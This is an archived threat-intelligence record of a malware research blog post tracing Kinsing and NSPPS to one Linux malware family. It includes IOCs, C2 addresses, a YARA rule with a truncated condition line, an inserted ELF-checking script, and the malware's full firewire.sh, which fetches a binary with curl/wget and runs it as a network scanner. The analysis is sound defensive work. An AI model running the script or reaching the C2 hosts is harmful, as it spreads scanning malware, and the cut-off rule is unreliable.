{
	"id": "9e0bbe05-d548-4341-b056-765c0ca70e3e",
	"created_at": "2026-04-06T00:07:22.69125Z",
	"updated_at": "2026-04-10T13:12:22.88384Z",
	"deleted_at": null,
	"sha1_hash": "0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a",
	"title": "Kinsing: The Malware with Two Faces",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9032555,
	"plain_text": "Kinsing: The Malware with Two Faces\r\nBy Aluma Lavi Shaari\r\nPublished: 2021-03-09 · Archived: 2026-04-05 22:41:56 UTC\r\nLately, we’ve been busy researching the developing field of cloud and container threats. Why focus here? Because, as this technology becomes more popular and continues to evolve, attackers are also evolving their techniques to infiltrate these systems.\r\nDuring our research, we came across Kinsing – an ELF malware that has been involved in multiple attack campaigns, including ones targeting Redis and SaltStack. Kinsing is written in Go (Golang), a relatively new language that has seen sharply increased popularity among malware authors within the past few years.\r\nWhile analyzing a few Kinsing samples, we were surprised to find some artifacts related to another malware family called NSPPS. At first, we came up with several ideas that might explain those findings: maybe the common parts are open source tools used by both families, or perhaps one group mimics the other. What our research shows is that the two families are actually the same one, with two different names given to it by the security research community.\r\nIn this blog, we will review the differences and similarities between Kinsing and NSPPS, present our findings and explain how and why we concluded that they are the same malware family.\r\nNSPPS vs. Kinsing – The Differences\r\nAt the beginning of the research, we collected all of the IOCs that were published by security firms for detecting Kinsing and NSPPS, wrote our own YARA rules and gathered the results. After a little clean-up, we had several dozen samples that we focused on.\r\nhttps://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces\r\nPage 1 of 21\n\nOf the 27 samples of Kinsing and NSPPS, only one of them was published as NSPPS: 5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6. 
The other 26 samples were classified as Kinsing.\r\nWe found some major artifacts differentiating the NSPPS sample from the Kinsing samples.\r\nVersions and Dates: Let’s Compare Numbers\r\nFirst and most notably, the NSPPS sample was built with Go version 1.9.7:\r\nFigure 1: Golang version for NSPPS\r\nKinsing samples were built with Go version 1.13.4 or 1.13.6:\r\nFigure 2: Golang versions for Kinsing\r\nThis difference suggests that the samples were compiled at different times, on the assumption that developers tend to build with a recent toolchain. It is a heuristic, not a guarantee, since nothing forces an author to upgrade. The toolchain version is itself a lower bound, though: the samples built with go1.13.6 cannot predate the release of that version in January 2020.\r\nDetermining the compilation timestamp of the samples was important to the process of differentiating the two families. Unfortunately, unlike Windows PE files, Linux ELF files do not carry a compilation timestamp by design, leaving us with another missing piece of information. Luckily, Go binaries embed the import paths of the packages they were built from (typically GitHub-hosted), and when built in module mode they also embed the version of each dependency, alongside the Go version string itself. This gives a lower bound for the compilation date: the binary cannot be older than the release date of the newest package version it contains.\r\nBelow is a partial list of the common packages for Kinsing samples with their release dates:\r\nPackage Version Release Date\r\ngo-resty/resty 2.1.0 10/10/2019\r\ngoogle/btree 1.0.0 13/08/2018\r\nkelseyhightower/envconfig 1.4.0 24/05/2019\r\nmarkbates/pkger 0.12.8 21/11/2019\r\npaulbellamy/ratecounter 0.2.0 19/07/2017\r\npeterbourgon/diskv 2.0.1 14/08/2017\r\nshirou/gopsutil 2.19.10 19/10/2019\r\nTable 1: a partial list of Kinsing packages with their release dates\r\n“pkger” has the latest release date:\r\nFigure 3: latest package release for Kinsing\r\nTherefore, we can conclude that all 26 Kinsing samples were compiled after Nov. 
21, 2019.\r\nBelow is a partial list of the packages NSPPS uses:\r\nPackage Version Release Date\r\ngoogle/btree 1.0.0 13/08/2018\r\ngo-resty/resty 2.1.0 10/10/2019\r\nkelseyhightower/envconfig 1.4.0 25/05/2019\r\npaulbellamy/ratecounter 0.2.0 19/07/2017\r\npeterbourgon/diskv 3.0.0 25/04/2019\r\nTable 2: a partial list of NSPPS packages with their release dates\r\nAs shown, the earliest possible compilation date for NSPPS is Oct. 10, 2019. A lower bound only says the sample is no older than that date, so this is consistent with NSPPS having been compiled before Kinsing, but it does not prove it.\r\nTo Be or Not to Be: That’s the Difference\r\nAn odd artifact found in Kinsing samples is the presence of the full text of William Shakespeare’s play Hamlet, as seen below:\r\nFigure 4: Hamlet play inside Kinsing\r\nThis artifact was previously reported by several researchers. The common assumption is that it was added to evade static detection engines or to inflate the binary size, which serves the same goal. It is not present in NSPPS samples.\r\nAt first, it seems like an important difference: maybe the authors of Kinsing paid more attention to hiding their malware than the authors of NSPPS. However, after digging a little deeper, we found another explanation. Looking at where the Hamlet text sits inside Kinsing, it is referenced from code rather than just lying in the data section among the binary’s other strings:\r\nFigure 5: Hamlet play X-refs\r\nThen, looking at the relevant function:\r\nFigure 
6: code X-references to the Hamlet play\r\nThis function’s name is github.com.markbates.pkger.internal.takeon.github.com.markbates.hepa.filters. Read from the end, that is a function in the filters file of the hepa package by markbates, copied under the internal/takeon directory of the pkger package, also by markbates, both hosted on GitHub.\r\nAnd as expected:\r\nFigure 7: pkger package that contains the Hamlet play\r\nWhich leads to the next piece of code:\r\nFigure 8: Hamlet play inside of pkger package\r\n(Check release 0.12.8 specifically: the author has since removed this piece from the package.)\r\nWhen analyzing the hepa package, we understood the purpose of Hamlet: it is used as filler text to overwrite secret parts of a buffer. For example, say you want to upload a useful AWS script to GitHub to share your wisdom with the world, but you are not sure you removed every part containing your secret AWS keys. In this situation, you may use a tool that automatically searches for credential-like content and redacts it. Think how awesome it would be to replace your token with a powerful phrase from Hamlet!\r\nNow, as you’ve probably noticed, pkger was not among the NSPPS packages, so the absence of Hamlet from NSPPS is simply a consequence of the absence of this package, which is used as part of the cryptomining activity (more on this later).\r\nThe bottom line is that although Hamlet is considered to be (or not to be?) a great and meaningful play, it’s not meaningful evidence in our comparison. 
Rather, it’s a side effect of other, more significant elements.\r\nWhere’s the money?\r\nWhen reading reports about Kinsing samples, it is clear that the purpose of Kinsing is to install a cryptominer named kdevtmpfsi, as shown in this diagram from Aqua Security:\r\nFigure 9: Kinsing diagram as posted by Aqua Security\r\nSource: https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability\r\nWhen looking at the code of Kinsing samples, we find many functions related to the cryptominer activity:\r\nFigure 10: Kinsing functions related to Miner activity\r\nThose functions are called from main.main, where the author’s program logic starts (the ELF entry point belongs to the Go runtime, which calls main.main once its own initialization is done).\r\nAll of the code related to cryptomining activity, including checks and actions, is missing from the NSPPS sample. This is a major difference between the two tools: the cryptomining functionality suggests that the purpose of the Kinsing malware is to install a cryptominer on the victim system, while the purpose of the NSPPS malware is to provide RAT functionality.\r\nNSPPS vs. Kinsing – The Similarities\r\nWhile we found several differences between Kinsing and NSPPS that make them look like completely different malware families, a tiny voice reminds us that we promised to prove they are from the same family. Below are some of those similarities.\r\nMasscan for All\r\nOne characteristic that repeats itself through all of the samples is the usage of the Masscan tool – more specifically, the exact same usage of Masscan. Both Kinsing and NSPPS contain an embedded, clear-text shell script named firewire.sh that is executed by the function main.masscan. 
This function writes the script to disk, marks it executable and then runs it. Judging by Appendix B, the script is a thin wrapper: it installs libpcap if it is missing, downloads a binary named firewire from the URL passed as its fifth argument unless a copy with the expected MD5 is already present, and runs that binary with Masscan’s -iL, --rate, -p and -oL options.\r\nSee the full firewire.sh script in Appendix B.\r\nThe code in main.masscan that handles this is as follows:\r\nFigure 11: Kinsing’s code for handling firewire.sh\r\nThe main.masscan function for NSPPS is a little different (probably due to the compiler version difference mentioned above) but contains the same WriteFile -\u003e runcmd -\u003e newobject sequence seen in Kinsing:\r\nFigure 12: NSPPS’s code for handling firewire.sh\r\nAs far as our research shows, the firewire.sh script is not publicly available, nor has it been released as an open source tool, so we believe this piece of evidence is not a coincidence. It indicates a connection between the authors of the two malwares, or at least that they shared resources.\r\nCode Structure\r\nWhen analyzing NSPPS, it is notable that it features a very simple code structure. At the beginning, NSPPS calls three initialization functions, then enters a loop that runs forever. Each iteration gets a task (getTask()) from the C2 server and executes it (doTask()). Inside doTask, the malware checks the string it received, then dispatches to the function that performs that task.\r\nTo our surprise, when analyzing Kinsing, we found it has the same structure, except for a few minor changes. The main change is an additional initialization function responsible for cryptomining. There are also some minor changes to the inner functions inside the loop.\r\nSee the code snippets below for a demonstration:\r\nFigure 
13: Pseudo-Code for NSPPS’s and Kinsing’s code structure comparison\r\nThere are also differences between individual Kinsing samples. For example, not all of them have the “redis_brute” functionality, and some have far fewer functions.\r\nGiven the common structure we just described, the relation between the two families hardly seems like a coincidence or random imitation; it looks more like cooperation between the authors, or even reuse of the same code.\r\nEncryption, Encryption, Encryption\r\nIn their analysis of the NSPPS sample, IronNet included a YARA rule that searches for an RC4 key used by NSPPS. Scanning for this specific RC4 key, we found it in all of the Kinsing samples as well as in the NSPPS sample (the key bytes are the $rc4_key hex string of the rule in Appendix A; they spell the ASCII characters 764153446b61):\r\nFigure 14: Kinsing RC4 key\r\nFigure 15: NSPPS RC4 key\r\nFollowing the cross-references to this key to find where it is used, we see that it is reached through almost the same functions in both malware families.\r\nUsage for NSPPS:\r\nFigure 16: RC4 key usage for NSPPS\r\nUsage for Kinsing:\r\nFigure 17: RC4 key usage for Kinsing\r\nThe only difference is the function getMinerPid, which exists only in the Kinsing samples, since NSPPS does not have the cryptomining functionality.\r\nLooking at the function main.RC4 that implements RC4 in both malwares, we see that the two implementations are practically identical. See the comparison below:\r\nFigure 
18: NSPPS’s and Kinsing’s main.RC4 function comparison\r\nFunction Names\r\nAfter all of this, the last thing to show is the function list of those samples.\r\nGo binaries keep their function names (in the symbol table and, even when stripped, in the runtime’s pclntab), which comes in handy in our case by making the entire list of original function names available. We already discussed the packages used in the binaries, which contain their own functions, so now we are interested in the functions written by the malware author. Those are identified by the prefix main., and they are the ones used in the next comparison.\r\nNSPPS has 63 functions.\r\nKinsing samples vary from each other a bit. Let’s compare a random Kinsing sample that was published earlier: b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f. This sample has only 59 functions (see Appendix C for a complete list of functions for both samples).\r\nBoth samples have 51 function names in common (81% of NSPPS’ 63 functions and 86% of Kinsing’s 59). Kinsing has eight unique function names and NSPPS has 12. Kinsing’s unique functions are mostly cryptomining-related, while NSPPS’ unique functions are mostly RAT-related. From that, we learn that a major part of the code is named the same, which implies that the same author wrote both samples or that one of the authors copied from the other.\r\nConclusion\r\nWe’ve presented both NSPPS and Kinsing and discussed their differences: Golang versions, packages, the Hamlet play text and cryptomining activity. We also presented the similarities of the two families: the Masscan script named firewire.sh, the shared code structure, the RC4 key and the function names.\r\nAll of the above suggests that both malwares represent the same family. We believe the first version was compiled sometime before Nov. 2019, was named NSPPS and was used as a RAT. 
Later, the malware was updated with some new packages (such as markbates/pkger), new functionality (cryptomining capabilities) and new Shakespearean inspiration, and was named Kinsing by other security companies.\r\nAlthough the usage and purpose of the malware changed, we as researchers can still benefit from the similarities between the versions, because analysis and detection become much easier and quicker using the knowledge we already have from former versions.\r\nA Note About Detection via VirusTotal\r\nWhen writing signatures for some Kinsing artifacts and searching for new samples, we found a few dozen files that clearly contain part of Kinsing’s code but are damaged as executables and cannot run as proper ELF files. Further examination showed that those files are only a fragment of another sample, meaning someone cut the sample and uploaded the piece to VirusTotal. For example, the sample d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b is a known Kinsing sample that is 16.87 MB long, and the file a51a4398dd7f11e34ea4d896cde4e7b0537351f82c580f5ec951a8e7ea017865, uploaded to VirusTotal on June 19, 2020, was detected as Kinsing by some AV vendors but is actually only the first 4.84 MB of that sample.\r\nThese partial samples could be an attacker testing different parts of the malware against AV engines, or a security researcher examining sections of the code. 
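Before running signatures over such a corpus, it helps to separate whole ELF files from fragments up front. The following Python script is an added example written for this page, not CyberArk’s code and not part of the original post: it parses the ELF header and walks the section header table, reporting anything that extends past the end of the data, and it skips SHT_NOBITS sections so that .bss does not inflate the expected size. Its input is a minimal ELF64 image constructed inside the script (section names, addresses and sizes are synthetic), which is then cut to its first 256 bytes to mimic a partial upload; the function names are my own.

```python
import struct

# Constants from the ELF specification.
ELF_MAGIC = bytes.fromhex('7f454c46')           # 0x7F 'E' 'L' 'F'
SHT_NULL, SHT_PROGBITS, SHT_STRTAB, SHT_NOBITS = 0, 1, 3, 8
# struct formats (byte-order prefix added later) for the ELF header after e_ident and for one
# section header, per ELF class (1 = 32-bit, 2 = 64-bit); field order follows Elf{32,64}_Ehdr/_Shdr.
LAYOUT = {1: ('HHIIIIIHHHHHH', 'IIIIIIIIII'), 2: ('HHIQQQIHHHHHH', 'IIQQQQIIQQ')}


def parse_ehdr(data):
    """Validate e_ident and unpack the ELF header. Returns (fields or None, ehdr_fmt, shdr_fmt)."""
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        raise ValueError('not an ELF file')
    ei_class, ei_data = data[4], data[5]
    if ei_class not in LAYOUT or ei_data not in (1, 2):
        raise ValueError('unsupported ELF class or byte order')
    endian = '<' if ei_data == 1 else '>'
    ehdr_fmt, shdr_fmt = (endian + f for f in LAYOUT[ei_class])
    if len(data) < 16 + struct.calcsize(ehdr_fmt):
        return None, ehdr_fmt, shdr_fmt             # the header itself is cut off
    return struct.unpack_from(ehdr_fmt, data, 16), ehdr_fmt, shdr_fmt


def check_elf(data):
    """Report whether an ELF image is complete: the section header table and every section
    that occupies file bytes (all but SHT_NULL/SHT_NOBITS) must end within the data."""
    size = len(data)
    report = {'filesize': size, 'truncated': False, 'problems': [], 'shdr_table_end': 0, 'max_section_end': 0}
    ehdr, _, shdr_fmt = parse_ehdr(data)
    if ehdr is None:
        report['truncated'] = True
        report['problems'].append('ELF header is incomplete')
        return report
    e_shoff, e_shentsize, e_shnum = ehdr[5], ehdr[10], ehdr[11]
    if e_shnum and e_shentsize < struct.calcsize(shdr_fmt):
        raise ValueError('malformed e_shentsize')
    # 1. Linkers place the section header table last, so a fragment cut from the front of a
    #    sample (like the 4.84 MB upload described above) normally loses it entirely.
    table_end = e_shoff + e_shnum * e_shentsize
    report['shdr_table_end'] = table_end
    if e_shnum and table_end > size:
        report['truncated'] = True
        report['problems'].append('section header table ends at %#x, past EOF (%#x)' % (table_end, size))
        return report                               # cannot walk headers that are not there
    # 2. Walk the sections. SHT_NOBITS (.bss, .noptrbss, ...) declares a size but has no file
    #    content, so it must be skipped; a raw sum of sh_size would overstate the expected size.
    for i in range(e_shnum):
        sh = struct.unpack_from(shdr_fmt, data, e_shoff + i * e_shentsize)
        sh_type, sh_offset, sh_size = sh[1], sh[4], sh[5]
        if sh_type in (SHT_NULL, SHT_NOBITS):
            continue
        end = sh_offset + sh_size
        report['max_section_end'] = max(report['max_section_end'], end)
        if end > size:
            report['truncated'] = True
            report['problems'].append('section %d ends at %#x, past EOF (%#x)' % (i, end, size))
    # Program headers (p_offset + p_filesz) could be checked the same way for stripped binaries.
    return report


def naive_section_size_sum(data):
    """Sum of every declared sh_size, NOBITS included, to show why that naive total misleads."""
    ehdr, _, shdr_fmt = parse_ehdr(data)
    if ehdr is None:
        return 0
    e_shoff, e_shentsize, e_shnum = ehdr[5], ehdr[10], ehdr[11]
    return sum(struct.unpack_from(shdr_fmt, data, e_shoff + i * e_shentsize)[5] for i in range(e_shnum))


def build_sample_elf():
    """Construct a minimal ELF64 little-endian image (synthetic test input, not a real sample)."""
    text = bytes([0xC3]) * 0x20                             # 32 bytes of 'ret' standing in for code
    names = [b'', b'.text', b'.bss', b'.shstrtab']
    shstrtab = b''.join(n + bytes(1) for n in names)        # NUL-terminated section name table
    name_off = {n: sum(len(m) + 1 for m in names[:k]) for k, n in enumerate(names)}
    text_off = 0x40                                         # directly after the 64-byte ELF header
    strtab_off = text_off + len(text)
    shoff = (strtab_off + len(shstrtab) + 7) & ~7           # 8-byte aligned section header table
    shdrs = [
        (0, SHT_NULL, 0, 0, 0, 0, 0, 0, 0, 0),
        (name_off[b'.text'], SHT_PROGBITS, 6, 0x401040, text_off, len(text), 0, 0, 16, 0),
        # .bss: 64 KiB of zero-initialised data that occupies no bytes in the file
        (name_off[b'.bss'], SHT_NOBITS, 3, 0x402000, strtab_off, 0x10000, 0, 0, 16, 0),
        (name_off[b'.shstrtab'], SHT_STRTAB, 0, 0, strtab_off, len(shstrtab), 0, 0, 1, 0),
    ]
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)    # ELFCLASS64, little-endian, version 1
    ehdr = e_ident + struct.pack('<HHIQQQIHHHHHH', 2, 0x3E, 1, 0x401040, 0, shoff, 0,
                                 64, 56, 0, 64, len(shdrs), len(shdrs) - 1)
    image = ehdr + text + shstrtab
    image += bytes(shoff - len(image))                     # alignment padding
    for sh in shdrs:
        image += struct.pack('<IIQQQQIIQQ', *sh)
    return image


if __name__ == '__main__':
    full = build_sample_elf()
    print('complete image :', check_elf(full))
    print('naive size sum :', naive_section_size_sum(full), 'bytes vs filesize', len(full))
    print('first 256 bytes:', check_elf(full[:256]))
```

Running it shows the complete image passing, the naive total of every declared section size (65590 bytes against a 376-byte file, because of the 64 KiB .bss) and the 256-byte fragment failing because its section header table lies past the end of the data. Against a real fragment such as the 4.84 MB upload above, the first check fires whenever the complete sample’s section header table lies beyond the cut point, which is the normal layout for a linker-produced ELF; when the table survives but the data does not, the per-section walk catches it instead.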
To detect only whole ELF files, the YARA rule below therefore adds a condition requiring the sizes declared in the section header table to be consistent with the size of the entire file, so that a truncated fragment does not match. Two caveats apply to any such check: a fragment cut from the front of a sample usually lacks the section header table altogether, since linkers place it at the end of the file, and sections of type SHT_NOBITS (such as .bss) declare a size but occupy no bytes in the file, so a raw sum of every declared section size overstates the expected file size.\r\nAppendix A: IOCs \u0026 YARA\r\nIOCs:\r\nIndicator Type\r\n0b0aa978c061628ec7cd611edeec3373d4742cbda533b07a2b3eb84a9dd2cb8a Sha256\r\n0c811140be9f59d69da925a4e15eb630352fa8ad4f931730aec9ae80a624d584 Sha256\r\n2132d7bed60fda38adda28efdbbd2df2c9379fed5de2e68fc6801f5621b596b0 Sha256\r\n4b0138c12e3209d8f9250c591fcc825ee6bff5f57f87ed9c661df6d14500e993 Sha256\r\n4f4e69abb2e155a712df9b3d0387f9fb2d6db8f3a2c88d7bbe199251ec08683f Sha256\r\n5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6 Sha256\r\n511de8dd7f3cb4c5d88cd5a62150e6826cb2f825fa60607a201a8542524442e2 Sha256\r\n554c233d0e034b8bb3560b010f99f70598f0e419e77b9ce39d5df0dd3bc25728 Sha256\r\n655ee9ddd6956af8c040f3dce6b6c845680a621e463450b22d31c3a0907727e4 Sha256\r\n6814d22be80e1475e47e8103b11a0ec0daa3a9fdd5caa3a0558d13dc16c143d9 Sha256\r\n681f88d79c3ecab8683b39f8107b29258deb2d58fcea7b0c008bab76e18aa607 Sha256\r\n6e8c96f9e9a886fd6c51cce7f6c50d1368ca5b48a398cc1fedc63c1de1576c1e Sha256\r\n7727a0b47b7fd56275fa3c1c4468db7fa201c788d1e56597c87deaff45aad634 Sha256\r\n7f9f8209dc619d686b32d408fed0beb3a802aa600ddceb5c8d2a9555cdb3b5e0 Sha256\r\n8c9b621ba8911350253efc15ab3c761b06f70f503096279f2a173c006a393ee1 Sha256\r\n98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c Sha256\r\n9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc Sha256\r\na0363f3caad5feb8fc5c43e589117b8053cbf5bc82fc0034346ea3e3984e37e8 Sha256\r\na5b010a5dd29d2f68ac9d5463eb8a29195f40f5103e1cc3353be2e9da6859dc6 Sha256\r\nb44dae9d1ce0ebec7a40e9aa49ac01e2c775fa9e354477a45b723c090b5a28f2 Sha256\r\nb70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f 
Sha256\r\nc44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76 Sha256\r\nc9932ca45e952668238960dbba7f01ce699357bedc594495c0ace512706dd0ac Sha256\r\nccfda7239b2ac474e42ad324519f805171e7c69d37ad29265c0a8ba54096033d Sha256\r\nd247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b Sha256\r\ndb3b9622c81528ef2e7dbefb4e8e9c8c046b21ce2b021324739a195c966ae0b7 Sha256\r\nf2e7244e2a7d6b28b1040259855aeac956e56228c41808bccb8e37d87c164570 Sha256\r\n104.248.3.165 C2\r\n139.99.50.255 C2\r\n185.61.7.8 C2\r\n188.120.254.224 C2\r\n193.33.87.220 C2\r\n195.123.220.193 C2\r\n45.10.88.102 C2\r\n46.229.215.164 C2\r\n46.243.253.167 C2\r\n47.65.90.240 C2\r\n62.113.112.127 C2\r\n67.205.161.58 C2\r\n91.215.169.111 C2\r\nYARA:\r\nimport \"elf\"\r\nrule Kinsing_Malware\r\n{\r\n    meta:\r\n        author = \"Aluma Lavi, CyberArk\"\r\n        date = \"22-01-2021\"\r\n        version = \"1.0\"\r\n        hash = \"d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b\"\r\n        description = \"Kinsing/NSPPS malware\"\r\n    strings:\r\n        $rc4_key = { 37 36 34 31 35 33 34 34 36 62 36 31 }\r\n        $firewire = \"./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT\"\r\n        $packa1 = \"google/btree\" ascii wide\r\n        $packa2 = \"kardianos/osext\" ascii wide\r\n        $packa3 = \"kelseyhightower/envconfig\" ascii wide\r\n        $packa4 = \"markbates/pkger\" ascii wide\r\n        $packa5 = \"nu7hatch/gouuid\" ascii wide\r\n        $packa6 = \"paulbellamy/ratecounter\" ascii wide\r\n        $packa7 = \"peterbourgon/diskv\" ascii wide\r\n        $func1 = \"main.RC4\" ascii wide\r\n        $func2 = \"main.runTaskWithScan\" ascii wide\r\n        $func3 = \"main.backconnect\" ascii wide\r\n        $func4 = \"main.downloadAndExecute\" ascii wide\r\n        $func5 = \"main.startCmd\" ascii wide\r\n        $func6 = \"main.execTaskOut\" ascii wide\r\n        $func7 = \"main.minerRunningCheck\" 
ascii wide\r\n    condition:\r\n        (uint16(0) == 0x457F\r\n        and not (elf.sections[0].size + elf.sections[1].size + elf.sections[2].size + elf.sec\r\n        and ($rc4_key\r\n            or $firewire\r\n            or all of ($packa*)\r\n            or 4 of ($func*)\r\n        )\r\n}\r\nAppendix B: Firewire.sh Script\r\n#!/bin/sh\r\nPORT=$1\r\nRATE=$2\r\nINPUT=$3\r\nOUTPUT=$4\r\nMASSCAN=$5\r\ncat /etc/os-release | grep -vw grep | grep \"rhel\" \u003e/dev/null\r\nif [ $? -eq 0 ]\r\nthen\r\n    rpm -qa | grep libpcap-dev \u003e /dev/null\r\n    if [[ $? -eq 0 ]]; then\r\n        echo \"Package is installed rhel!\"\r\n    else\r\n        echo \"Package is NOT installed rhel!\"\r\n        yum -y update\r\n        yum -y install libpcap-devel\r\n    fi\r\nelse\r\n    if [ $(dpkg-query -W -f='${Status}' libpcap-dev 2\u003e/dev/null | grep -c \"ok installed\"\r\n    then\r\n        echo \"Package is NOT installed deb!\"\r\n        apt-get update\r\n        apt-get install -y libpcap-dev\r\n    else\r\n        echo \"Package is installed deb!\"\r\n    fi\r\nfi\r\nif [ -x \"$(command -v md5sum)\" ]; then\r\n    sum=$(md5sum firewire | awk '{ print $1 }')\r\n    echo $sum\r\n    case $sum in\r\n        45a7ef83238f5244738bb5e7e3dd6299)\r\n            echo \"firewire OK\"\r\n            ;;\r\n        *)\r\n            echo \"firewire wrong\"\r\n            (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)\r\n            ;;\r\n    esac\r\nelse\r\n    echo \"No md5sum\"\r\n    (curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)\r\nfi\r\nchmod +x firewire\r\n./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2\u003e/dev/null\r\nif [ $? -eq 0 ]\r\nthen\r\n    echo \"success\"\r\nelse\r\n    echo \"fail\"\r\n    sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2\u003e/dev/null\r\n    if [ $? 
-eq 0 ]\r\n    then\r\n        echo \"success2\"\r\n    else\r\n        echo \"fail2\"\r\n    fi\r\nfi\r\nAppendix C: NSPPS \u0026 Kinsing Function list\r\nThe columns list the main. functions of the NSPPS sample and of the Kinsing sample compared in the Function Names section; a dash marks a function that sample lacks.\r\nNSPPS  Kinsing\r\nDownloadFile  DownloadFile\r\nExecOutput  ExecOutput\r\nHosts  Hosts\r\n-  Pid\r\nRC4  RC4\r\nRandStringRunes  RandStringRunes\r\nResult  Result\r\nSetSocks  SetSocks\r\nSpecification  Specification\r\nTargetsWrapper  TargetsWrapper\r\nTask  Task\r\nTaskPair  TaskPair\r\naddResult  addResult\r\nbackconnect  -\r\ncheckHealth  checkHealth\r\nconnectForSocks  connectForSocks\r\ncontains  contains\r\n-  copyFileContents\r\ndoRequestWithTooManyOpenFiles  -\r\ndoTask  doTask\r\ndownloadAndExecute  -\r\nencStruct  encStruct\r\nexecTask  execTask\r\nexecTaskOut  execTaskOut\r\ngetActiveC2CUrl  -\r\n-  getMinerPid\r\ngetOrCreateListForTaskResult  getOrCreateListForTaskResult\r\ngetOrCreateRateCounterForTask  getOrCreateRateCounterForTask\r\ngetOrCreateUuid  getOrCreateUuid\r\ngetTargets  getTargets\r\ngetTask  getTask\r\ngetWriteableDir  getWriteableDir\r\ngo  go\r\nhash_file_md5  hash_file_md5\r\nhealthChecker  healthChecker\r\ninc  inc\r\ninit  init\r\n-  isMinerRunning\r\nmain  main\r\nmakeClient  -\r\nmasscan  masscan\r\n-  minRun\r\n-  minerRunningCheck\r\nmove  move\r\nrandIntRange  randIntRange\r\nredisBrute  -\r\nrequest  -\r\nresultSender  resultSender\r\nrunTask  runTask\r\nrunTaskWithHttp  -\r\nrunTaskWithScan  -\r\nruncmd  runcmd\r\n-  sendMinerPid\r\nsendResult  sendResult\r\nsendSocks  sendSocks\r\nsetActiveC2CUrl  setActiveC2CUrl\r\nsetExecOutput  setExecOutput\r\nsetLog  setLog\r\nsetUuid  setUuid\r\nsocks  socks\r\nstartCmd  startCmd\r\n-  startCmdWithOutputSingle\r\nstartSocks  startSocks\r\nsyncCmd 
syncCmd\r\ntaskScan  taskScan\r\ntaskWithHttpWorker  -\r\ntaskWithScanWorker  -\r\ntaskWorker  taskWorker\r\ntcpTask  -\r\nupdateTask  updateTask\r\nwritable  writable\r\nSource: https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces"
	],
	"report_names": [
		"kinsing-the-malware-with-two-faces"
	],
	"threat_actors": [
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434042,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.pdf",
		"text": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.txt",
		"img": "https://archive.orkl.eu/0abfbb0c64d835cbcfb708b8896fd6cbe9b4d13a.jpg"
	}
}